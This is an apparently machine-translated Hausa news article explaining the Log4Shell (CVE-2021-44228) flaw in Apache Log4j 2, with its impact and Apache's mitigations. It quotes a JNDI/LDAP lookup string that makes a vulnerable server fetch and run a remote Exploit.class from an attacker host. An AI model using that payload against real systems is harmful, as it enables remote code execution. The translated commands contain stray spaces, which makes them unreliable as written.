Log4Shell, mummunan rauni a cikin Apache Log4j 2 wanda ke shafar ayyukan Java da yawa

Darkcrizt

4 minti

Kwanan nan se ya fitar da labarin cewa an gano mummunan rauni a cikin Apache Log4j 2, wanda aka siffanta shi azaman sanannen tsarin tsara rajista a aikace-aikacen Java, yana ba da damar aiwatar da code na sabani lokacin da aka rubuta ƙima ta musamman ga wurin yin rajista a cikin tsarin "{jndi: URL}".

Ularfafawa Yana da sananne saboda ana iya kai harin a aikace-aikacen Java cewaSuna rikodin ƙimar da aka samo daga tushen waje, misali ta hanyar nuna ƙima mai matsala a cikin saƙonnin kuskure.

An lura cewa Kusan duk ayyukan da ke amfani da tsarin kamar Apache Struts, Apache Solr, Apache Druid ko Apache Flink sun shafi, ciki har da Steam, Apple iCloud, abokan ciniki na Minecraft da sabobin.

Ana sa ran rashin lahani zai haifar da guguwar kai hare-hare kan aikace-aikacen kasuwanci, maimaita tarihin raunin rauni a cikin tsarin, Apache Struts, wanda shine ƙima mai ƙima da aka yi amfani da shi a cikin 65% na aikace-aikacen yanar gizo na Fortune 100. Jerin aikace-aikacen gidan yanar gizon kamfanin. an haɗa yunƙurin yin rikodin riga-kafi don duba hanyar sadarwar don tsarin mara ƙarfi.

Rashin lahani yana ba da damar aiwatar da lambar da ba ta dace ba. Log4j 2 babban ɗakin karatu ne na log ɗin Java wanda Gidauniyar Apache ta haɓaka. Log4j 2 ana amfani dashi sosai a aikace-aikace da yawa kuma yana nan, azaman abin dogaro, a cikin ayyuka da yawa. Waɗannan sun haɗa da aikace-aikacen kasuwanci da sabis na girgije da yawa.

Ƙungiyar harin Randori ta haɓaka amfani mai aiki kuma ta sami nasarar yin amfani da wannan rauni a cikin mahallin abokan ciniki a matsayin wani ɓangare na dandalin tsaro na mu mai muni. 

Ana iya samun dama ga raunin ta hanyoyi da dama na takamaiman aikace-aikace. Tabbas, duk wani yanayin da ke ba da damar haɗin nesa don samar da bayanan sabani wanda aikace-aikacen da ke amfani da ɗakin karatu na Log4j ya rubuta don shiga fayilolin yana da sauƙin amfani. Wannan raunin yana iya yiwuwa a yi amfani da shi sosai a cikin daji kuma yana iya shafar dubban kungiyoyi. Wannan raunin yana wakiltar babban haɗari na gaske ga tsarin da abin ya shafa.

Matsalar ta ƙara da cewa an riga an buga wani amfani mai aiki, misali.Amma ba a samar da gyara ga tsayayyen rassan ba tukuna. Har yanzu ba a sanya mai gano CVE ba. An haɗa maganin kawai a cikin reshen gwajin log4j-2.15.0-rc1. A matsayin wurin aiki don toshe raunin, ana ba da shawarar saita siga Log4j2.formatMsgNoLookups zuwa gaskiya.

Matsalar ya kasance saboda gaskiyar cewa Log4j 2 yana goyan bayan sarrafa mashin musamman «{}» a cikin layin log., a ciki Ana iya gudanar da tambayoyin JNDI (Java Sunan da Interface Interface).

A cikin nazarin CVE-2021-44228, Randori ya ƙaddara mai zuwa:

Tsohuwar shigarwa na software na kasuwanci da ake amfani da su sosai suna da rauni.
Za a iya yin amfani da raunin abin dogaro kuma ba tare da tantancewa ba.
Lalacewar yana shafar nau'ikan Log4j 2 da yawa.
Rashin lahani yana ba da damar aiwatar da lambar nesa lokacin da mai amfani ya gudanar da aikace-aikacen ta amfani da ɗakin karatu.

Harin ya ragu zuwa wuce kirtani tare da maye gurbin "$ {jndi: ldap: //example.com/a}", sarrafa wanda Log4j 2 zai aika da buƙatar LDAP don hanyar zuwa ajin Java zuwa uwar garken attacker.com . Hanyar da uwar garken maharin ya dawo (alal misali, http://example.com/Exploit.class) za a loda shi kuma a aiwatar da shi a cikin mahallin tsarin da ake ciki yanzu, yana bawa maharin damar cimma aiwatar da code na sabani akan tsarin tare da haƙƙin mallaka. na aikace-aikacen yanzu.

A ƙarshe, an ambaci hakan idan an sami rashin daidaituwa, Ana ba da shawarar ku ɗauka cewa wannan lamari ne mai aiki, cewa an daidaita shi, kuma ku amsa daidai. Haɓakawa zuwa nau'ikan Log4j 2 da aka daidaita ko aikace-aikacen da abin ya shafa zai kawar da wannan raunin. Randori yana ba da shawarar kowace ƙungiya da take tunanin za a iya shafa ta cikin gaggawa ta haɓaka zuwa sigar da aka yi mata.

A cikin sabon sabuntawa daga ƙungiyar Apache Log4j, bayar da shawarar cewa kungiyoyi suyi haka

  • Sabuntawa zuwa Log4j 2.15.0
  • Ga waɗanda ba za su iya haɓakawa zuwa 2.15.0: A cikin sigogin> = 2.10, ana iya rage wannan raunin ta hanyar saita tsarin tsarin log4j2.formatMsgNoLookup ko yanayin LOG4J_FORMAT_MSG_NO_LOOKUPS zuwa gaskiya.
  • Don nau'ikan 2,0-beta9 zuwa 2.10.0, ragewa shine cire ajin JndiLookup daga hanyar aji: zip -q -d log4j-core - *. Jar org / apache / logging / log4j / core / lookup /JndiLookup.class.

Source: https://www.lunasec.io/


Bar tsokaci

Your email address ba za a buga. Bukata filayen suna alama da *

*

*

  1. Wanda ke da alhakin bayanan: Miguel Ángel Gatón
  2. Manufar bayanan: Sarrafa SPAM, sarrafa sharhi.
  3. Halacci: Yarda da yarda
  4. Sadarwar bayanan: Ba za a sanar da wasu bayanan ga wasu kamfanoni ba sai ta hanyar wajibcin doka.
  5. Ajiye bayanai: Bayanin yanar gizo wanda Occentus Networks (EU) suka dauki nauyi
  6. Hakkoki: A kowane lokaci zaka iyakance, dawo da share bayanan ka.